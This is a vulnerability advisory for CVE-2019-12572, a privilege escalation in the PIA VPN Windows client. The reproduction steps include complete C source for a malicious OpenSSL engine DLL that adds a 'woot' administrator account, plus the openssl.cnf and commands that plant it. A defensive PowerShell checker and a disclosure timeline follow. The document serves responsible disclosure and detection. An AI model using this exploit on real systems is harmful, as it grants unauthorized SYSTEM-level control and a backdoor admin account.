Title: PIA Windows Privilege Escalation: Malicious OpenSSL engine
Author: Rich Mirch
CVE: CVE-2019-12572
Vendor Advisory: N/A
Blog Post: https://blog.mirch.io/2019/06/10/cve-2019-12572-pia-windows-privilege-escalation-malicious-openssl-engine/
Description
A vulnerability in the London Trust Media Private Internet Access (PIA) VPN
Client 1.0.2 (build 02363) for Windows could allow an authenticated, local
attacker to run arbitrary code with elevated privileges.
On startup the PIA Windows service (pia-service.exe) loads the OpenSSL library from
C:\Program Files\Private Internet Access\libeay32.dll. This library attempts
to load the c:\etc\ssl\openssl.cnf configuration file, which does not exist. By
default on Windows systems, authenticated users can create directories under c:\.
A low privileged user can therefore create an openssl.cnf configuration file that loads a
malicious OpenSSL engine library, resulting in arbitrary code execution as
SYSTEM when the service starts.
CVSS
Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:H/RL:U/RC:C
Base: 7.8
Temporal: 7.8
Test Environment
OS: Windows 10 Pro 10.0.17763
PIA Version: 1.0.2 (build 02363)
Steps to reproduce
Note: All steps are executed using a low privileged account.
1) Create the c:\etc\ssl directory
mkdir c:\etc\ssl
2) Create a malicious engine library named woot.dll to create an administrator
account named woot when loaded.
/* Cross compile with
   x86_64-w64-mingw32-g++ woot.c -o woot.dll -shared
*/
#include <windows.h>
#include <stdlib.h>   /* system() */

BOOL WINAPI DllMain(
    HINSTANCE hinstDLL,
    DWORD fdwReason,
    LPVOID lpReserved )
{
    switch( fdwReason )
    {
        case DLL_PROCESS_ATTACH:
            /* Runs in the context of the loading process (here pia-service.exe as SYSTEM). */
            system("cmd /c net user woot insertpasswordhere /add");
            system("cmd /c net localgroup administrators woot /add");
            break;
        case DLL_THREAD_ATTACH:
            // Do thread-specific initialization.
            break;
        case DLL_THREAD_DETACH:
            // Do thread-specific cleanup.
            break;
        case DLL_PROCESS_DETACH:
            // Perform any necessary cleanup.
            break;
    }
    return TRUE; // Successful DLL_PROCESS_ATTACH.
}
3) Copy the malicious woot.dll file into the c:\etc\ssl folder.
copy woot.dll c:\etc\ssl
4) Create the OpenSSL configuration file in c:\etc\ssl\openssl.cnf with the following contents.
openssl_conf = openssl_init
[openssl_init]
engines = engine_section
[engine_section]
woot = woot_section
[woot_section]
engine_id = woot
dynamic_path = c:\\etc\\ssl\\woot.dll
init = 0
5) Reboot the system because a low privilege user does not have permission to
restart the service.
6) After the reboot has completed, log in and open a command shell. At this point
the "woot" administrator account will exist.
net user woot
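The two preconditions described above are both checkable from the defender's side: whether anything has claimed the compiled-in OpenSSL configuration directory that libeay32.dll looks for, and whether the drive root still grants non-administrators the right to create subdirectories. The following PowerShell script is an added example and is not part of the original advisory or of the PIA client; it assumes the configuration directory is c:\etc\ssl and the file name is openssl.cnf, exactly as stated above, and it resolves the openssl_conf -> engines -> engine section -> dynamic_path chain in the same way the configuration in step 4 is structured. Run it from an elevated PowerShell on a host you manage.

```powershell
# Added example (not from the advisory): check the preconditions for CVE-2019-12572
# on a host. Assumes OPENSSLDIR = C:\etc\ssl and config file name openssl.cnf, as stated
# in the advisory.

$OpenSslDir = 'C:\etc\ssl'                       # compiled-in OPENSSLDIR of the shipped libeay32.dll
$ConfigPath = Join-Path $OpenSslDir 'openssl.cnf'

function Get-EngineDynamicPaths {
    # Parse an openssl.cnf and follow the section chain OpenSSL uses to load engines:
    #   openssl_conf = <init>  ->  [<init>] engines = <eng>  ->  [<eng>] id = <sect>  ->  [<sect>] dynamic_path
    param([Parameter(Mandatory)][string]$Path)

    $sections = @{}                 # section name -> ordered key/value pairs
    $current  = ''                  # keys before the first [header] belong to the default section
    $sections[$current] = [ordered]@{}

    foreach ($raw in Get-Content -Path $Path) {
        $line = ($raw -replace '#.*$', '').Trim()     # drop comments and surrounding whitespace
        if (-not $line) { continue }
        if ($line -match '^\[(.+)\]$') {
            $current = $Matches[1].Trim()
            if (-not $sections.ContainsKey($current)) { $sections[$current] = [ordered]@{} }
            continue
        }
        if ($line -match '^([^=]+)=(.*)$') {
            $sections[$current][$Matches[1].Trim()] = $Matches[2].Trim()
        }
    }

    $initName = $sections[''].openssl_conf
    if (-not $initName -or -not $sections.ContainsKey($initName)) { return @() }
    $enginesName = $sections[$initName].engines
    if (-not $enginesName -or -not $sections.ContainsKey($enginesName)) { return @() }

    foreach ($engineId in @($sections[$enginesName].Keys)) {
        $engineSection = $sections[$enginesName][$engineId]
        if ($sections.ContainsKey($engineSection) -and $sections[$engineSection].Contains('dynamic_path')) {
            [pscustomobject]@{
                EngineId    = $engineId
                # openssl.cnf escapes backslashes, so "c:\\etc\\ssl\\x.dll" means c:\etc\ssl\x.dll
                DynamicPath = $sections[$engineSection].dynamic_path -replace '\\\\', '\'
            }
        }
    }
}

function Test-RootCreateDirectoryRight {
    # Return the ACEs on the drive root that let broad, non-admin principals create
    # subdirectories of the root itself. CreateDirectories (= AppendData, bit 4) is the
    # right a standard user needs to create C:\etc; InheritOnly ACEs (bit 2) do not
    # apply to the root folder and are skipped.
    param([string]$Root = 'C:\')
    (Get-Acl -Path $Root).Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        (([int]$_.FileSystemRights -band 4) -ne 0) -and
        (([int]$_.PropagationFlags -band 2) -eq 0) -and
        $_.IdentityReference -match 'Authenticated Users|\\Users$|Everyone'
    } | Select-Object IdentityReference, FileSystemRights, InheritanceFlags, PropagationFlags
}

Write-Host "Checking $OpenSslDir ..."
if (Test-Path -Path $OpenSslDir) {
    $owner = (Get-Acl -Path $OpenSslDir).Owner
    Write-Host "  exists, owned by $owner (not expected on a clean host; check who created it)"
    if (Test-Path -Path $ConfigPath) {
        foreach ($e in Get-EngineDynamicPaths -Path $ConfigPath) {
            Write-Host ("  engine '{0}' would load {1}" -f $e.EngineId, $e.DynamicPath)
        }
    }
} else {
    Write-Host '  absent (expected)'
}

Write-Host 'ACEs on C:\ that allow non-administrators to create directories:'
Test-RootCreateDirectoryRight | Format-Table -AutoSize
```

A non-empty engine list from an openssl.cnf under a user-created c:\etc\ssl is the indicator to act on; the owner of the directory tells you which account created it. The fix the vendor shipped (v1.2.1, per the timeline below) is the real remediation; until a vulnerable build is replaced, a common compensating control is to pre-create the directory yourself with an administrators-only ACL so that no standard user can claim the path.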
Timeline
2019-02-16: Reported to vendor
2019-02-16: Vendor confirmed vulnerability
2019-06-04: Vendor released fix in v1.2.1
2019-06-10: Public disclosure